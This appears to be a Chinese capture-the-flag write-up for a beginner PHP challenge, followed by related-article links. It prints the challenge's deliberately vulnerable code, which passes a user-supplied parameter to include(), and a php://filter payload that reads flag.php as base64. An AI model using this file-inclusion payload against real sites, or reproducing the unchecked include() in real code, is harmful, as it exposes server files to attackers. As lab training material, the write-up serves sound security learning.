[SWPUCTF 2022 新生赛]ez_ez_php

[SWPUCTF 2022 新生赛]ez_ez_php wp

题目代码如下:

 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 

    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

根据代码,GET 传入的参数要以 php 开头,并且提示有一个 flag.php 文件。那就直接用 php 伪协议。

php://filter 伪协议

payload

file=php://filter/read=convert.base64-encode/resource=flag.php

返回结果:

base64 解码后得到 flag.php 文件内容:

这里有些乱码,但可以看得出来提示:真正的 flag 在名为 'flag' 的文件里面。

那就用伪协议再读一次:

拿到 flag 。

相关推荐
?333332 小时前
CTFHub Web进阶-PHP-Bypass disable_function攻略
开发语言·安全·web安全·php
hking1112 小时前
upload-labs关卡记录12
web安全·php
网安-轩逸4 小时前
基于ISO 21434的汽车网络安全实践
web安全·汽车·php
亚远景aspice4 小时前
亚远景-ISO 21434标准下的汽车网络安全测试:全面要求与实施策略
网络·web安全·汽车
为几何欢5 小时前
【hackmyvm】soul靶机wp
安全·网络安全·渗透·hackmyvm·hmv
网络安全Jack10 小时前
什么是网络安全等级保护?
网络·安全·web安全
Dovir多多11 小时前
Python数据处理——re库与pydantic的使用总结与实战,处理采集到的思科ASA防火墙设备信息
网络·python·计算机网络·安全·网络安全·数据分析
Clockwiseee13 小时前
RCE常见姿势
安全·web安全·网络安全